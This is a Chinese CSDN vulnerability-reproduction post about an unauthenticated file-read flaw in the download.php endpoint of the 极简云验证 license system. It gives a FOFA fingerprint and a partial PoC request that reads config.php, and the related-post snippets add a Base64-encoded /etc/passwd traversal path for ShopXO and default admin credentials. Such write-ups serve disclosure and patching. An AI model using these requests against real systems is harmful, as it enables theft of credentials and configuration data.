极简云验证 download.php 文件读取漏洞复现

0xSecl

已于 2024-04-03 23:35:29 修改

阅读量1.3k

点赞数 1

分类专栏：漏洞复现v1 文章标签：安全 web安全

于 2024-04-03 23:35:21 首次发布

本文链接：https://blog.csdn.net/qq_41904294/article/details/137360381

版权

漏洞复现v1 专栏收录该内容

997 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了极简云验证系统中download.php接口存在的文件读取漏洞，攻击者能未授权读取系统敏感信息。文章详细阐述了漏洞概述，提供了复现环境，并给出修复建议，包括限制接口访问权限或升级到安全版本。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

0x01 产品简介

极简云验证是一款开源的网络验证系统，支持多应用卡密生成：卡密生成单码卡密次数卡密会员卡密积分卡密、卡密管理卡密长度卡密封禁批量生成批量导出自定义卡密前缀等；支持多应用多用户管理：应用备注应用版本多级代理价格免费付费切换验证用户IP 验证用户设备应用开关等

0x02 漏洞概述

极简云验证 download.php 接口处存在文件读取漏洞，未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件，数据库账号密码等敏感信息，使系统处于极不安全的状态。

0x03 复现环境

FOFA： "../assets/img/bg/logo_white.png"

0x04 漏洞复现

PoC

GET /download.php?file=20b6cb088a8d5c444074&filename=config.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/h

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

0xSecl

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

订阅专栏

蓝海卓越计费管理系统漏洞学习——download.php 任意文件读取漏洞

记录并分享学习安全的知识点..

10-02

512

蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞，攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件。

红队专题-漏洞挖掘-代码审计-反序列化

最新发布

aming小老弟

04-21

1869

TransformedMap⽤于对Java标准数据结构Map做⼀个修饰，被修饰过的Map在添加新的元素时，将可以执⾏⼀个回调。super(map);

参与评论您还未登录，请先登录后发表或查看评论

极简云网络验证系统开源源码.zip

11-16

极简云验证，多样化应用管理方式，多种项目任你开发，分布式应用开关，让您的应用开发更简单，本系统借鉴于易如意API写法及思路，(天神项目组已于2019年获得易如意作者官方授权)完美实现多用户多应用管理。支持多应用卡密生成：卡密生成单码卡密次数卡密会员卡密积分卡密卡密管理卡密长度卡密封禁批量生成批量导出自定义卡密前缀等支持多应用多用户管理：应用备注应用版本多级代理价格免费付费切换验证用户IP 验证用户设备应用开关等源码特色： 1，对接：详细的API文档，各种语言对接示例让您的接入更加简单 2，安全：客户端与服务器双向效验，动态数据加密，让您的数据“动起来” 3，API：各种API尽情对接，让您的应用大放光彩 4，快捷：后台一键式开关，应用版本，远程更新，更新内容等，让您更快捷更省心 5，功能：丰富的功能，各类数据统计，人性化的体验，满足您的更多需求 6，其他：内置商城、聊天室、工单等

【极简云网络验证+注入器】

weixin_49472450的博客

03-29

368

如果不知道如何配置邮箱，可以下载网盘中的reg.php文件，然后将其上传到源码的user目录中。之后，注册过程就不需要发送邮箱了，只需填写固定验证码。简化版的云商业源码已经以开源形式发布了，现在可以解绑卡密和查询卡密。总体而言，这个版本已经相当完善了。在对接示例网盘中有一个用户注册的例子，需要配置一个邮箱。您可以在网页上启用QQ邮箱的标准版SMTP，并生成一个授权码。后台网址为域名/admin，后台账号为admin，密码为123456。导入数据库后，请修改数据库文件config.php。

极简云网络验证系统开源源码

极致技术工厂 | www.yzfuye.com

02-21

838

简化版的云商业源码已经以开源形式发布了，现在可以解绑卡密和查询卡密。总体而言，这个版本已经相当完善了。在对接示例网盘中有一个用户注册的例子，需要配置一个邮箱。您可以在网页上启用QQ邮箱的标准版SMTP，并生成一个授权码。将发信邮箱填写在后台设置中即可。如果不知道如何配置邮箱，可以下载网盘中的reg.php文件，然后将其上传到源码的user目录中。之后，注册过程就不需要发送邮箱了，只需填写固定验证码。请确保您使用的是php7.0和mysql5.6+版本。导入数据库后，请修改数据库文件config.php。

云网络验证系统云验证+卡密生成+多应用多用户管理

软希网分享源码的博客

10-22

961

云网络验证系统云验证+卡密生成+多应用多用户管理

极简云验证商业版已经开源源码

软希网分享源码的博客

01-26

1476

极简云验证商业版已经开源源码

永久免费的网络验证文心云验证最好用的webapi验证卡密系统验证系统

2401_84158518的博客

10-03

5481

永久免费的网络验证文心云验证最好用的webapi验证卡密系统验证系统

源码-自绘网络验证源码网络验证

12-10

源码_自绘网络验证源码_自绘网络验证源码网络验证

【鲱鱼EXUI】极简扁平UI网络验证源码

03-28

极简扁平UI网络验证源码示例截图 https://s1.ax1x.com/2020/03/28/Gkf7Ix.png

网络验证源码

01-25

一款不错的网络验证源码，易语言编写的

极简云源码开源.zip

01-13

极简云已经开源解绑卡密查询卡密总体来说还是很完善的对接例子网盘里有用户注册需要配置邮箱上网页QQ邮箱标准版开启SMTP 然后生成授权码后台发信邮箱里填就对了实在不会配置邮箱的可以下载网盘里的reg.php 把reg.php上传源码里的user目录之后注册就不需要去发送邮箱只要填固定验证码 php7.0 mysql5.6+ 导入数据库修改数据库文件config.php 后台网址：域名/admin 后台账号：admin 密码：123456

极验验证码破解—超详细教程（一）

热门推荐

易云云博客

08-20

1万+

极验验证码破解—超详细教程（一）繁华不以物喜 52 人赞同了该文章 [国家企业信用信息公示系统为例] 极验验证码破解—超详细教程（一）极验验证码破解—超详细教程（二）极验验证码破解—超详细教程（三） Gayhub:FanhuaandLuomu/geetest_break 2017.8.21 代码以上传，可供参考目录一、网站http://www.gsxt.gov.cn滑动验证码概述. 二、极验验证码破解-抓包分析. 三、极验验证码破解-搭建本地验证码服务. 四、.

极简云网络验证系统的开源代码

estar3339的博客

01-21

443

本系统借鉴于易如意的API写法及思路，并已获得官方授权，可完美实现多用户多应用管理。其他：内置商城、聊天室、工单等模块，致力于为您提供最佳的体验。应用备注、应用版本、多级代理价格、免费付费切换、验证用户IP、验证用户设备、应用开关等。快捷：后台一键式开关，应用版本、远程更新及更新内容等功能，让您的操作更加便捷。功能：拥有丰富的功能，各类数据统计及人性化的体验，满足您的多样化需求。卡密管理：卡密长度、卡密封禁、批量生成、批量导出、自定义卡密前缀等。卡密生成：单码卡密、次数卡密、会员卡密、积分卡密。

极验验证码破解—超详细教程（三）

易云云博客

08-20

2792

极验验证码破解—超详细教程（三） Gayhub:FanhuaandLuomu/geetest_brek [国家企业信用信息公示系统为例] 目录一、网站http://www.gsxt.gov.cn滑动验证码概述. 二、极验验证码破解-抓包分析. 三、极验验证码破解-搭建本地验证码服务. 四、极验验证码破解-分析geetest.js，得到所需参数. 五、极验验证码破解-Track的获取. 六、极验验证码破解-获取背景图片及缺口距离d的计算. 七、极验验证码破解-总结. 参考文献. 运行

ShopXO download 任意文件读取漏洞

01-17

### 关于 ShopXO 下载中的任意文件读取漏洞 ShopXO 是一套开源的企业级电子商务系统，支持多个终端并遵循 Apache2 开源协议发布。然而，在某些版本中存在安全缺陷，允许攻击者通过特定 URL 参数实现任意文件读取操作[^3]。 #### 漏洞详情具体来说，当访问带有特殊构造参数 `url` 的路径 `/public/index.php?s=/index/qrcode/download/url/` 时，如果传入的是经过 Base64 编码后的服务器本地文件路径，则可以触发此漏洞来读取指定文件的内容。例如： ```plaintext /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= ``` 上述请求会尝试读取 Linux 系统下的 `/etc/passwd` 文件内容，因为 L2V0Yy9wYXNzd2Q= 正是该路径经由 Base64 编码的结果[^5]。这种类型的漏洞可能导致敏感数据泄露，如配置文件、日志记录甚至是数据库凭证等重要资料被非法获取，从而给网站带来严重的安全隐患。 #### 修复建议为了防止此类问题的发生，开发者应当采取以下措施之一或组合使用： - **输入验证**：严格校验用户提交的所有输入项，特别是那些用于构建文件路径的部分，确保其合法性。 - **白名单机制**：仅允许访问预定义的安全资源列表内的项目，拒绝其他任何形式的外部链接指向内部文件系统的请求。 - **禁用危险功能**：对于不必要的特性（比如二维码下载接口），可以选择关闭它们以减少潜在风险面。 - **更新补丁**：及时跟进官方发布的最新版程序包以及相应的安全公告，安装必要的修补程序来解决已知的安全隐患[^1]。